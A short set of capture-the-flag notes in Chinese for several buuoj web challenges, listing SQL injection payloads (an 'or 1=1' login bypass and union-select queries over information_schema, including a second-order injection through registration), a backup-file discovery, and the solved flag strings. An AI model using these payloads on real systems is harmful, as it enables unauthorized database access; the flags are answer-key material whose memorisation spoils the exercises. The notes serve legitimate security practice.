buuoj WEB做题笔记
[极客大挑战 2019]EasySQL
password输入存在注入: 123'or 1=1 --'
flag{68144110-18b9-4882-93f1-6f6e7b1c67ec}
[极客大挑战 2019]Havefun
看网页源码,发现尾部有一段注释得代码,尝试 /?cat=dog,回显得flag{01c680f5-0d62-4e2c-a805-cfcf6b9252db}
[极客大挑战 2019]PHP
根据页面提示“我有一个良好的备份网站的习惯”,从网站下载www.zip,发现flag.php,得:Syc{dog_dog_dog_dog}
October 2019 Twice SQL Injection
审计源码。
1> 使用 1' union select group_concat(table_name) from information_schema.tables where table_schema=database() # 作为用户名,注册,然后登陆,获得三张表名:flag,news,users
2> 使用 1' union select concat(flag) from flag # 作为用户名,注册,然后登陆,获得flag
flag{fa7f6f08-c2cc-4c72-8ed7-1993959cd35c}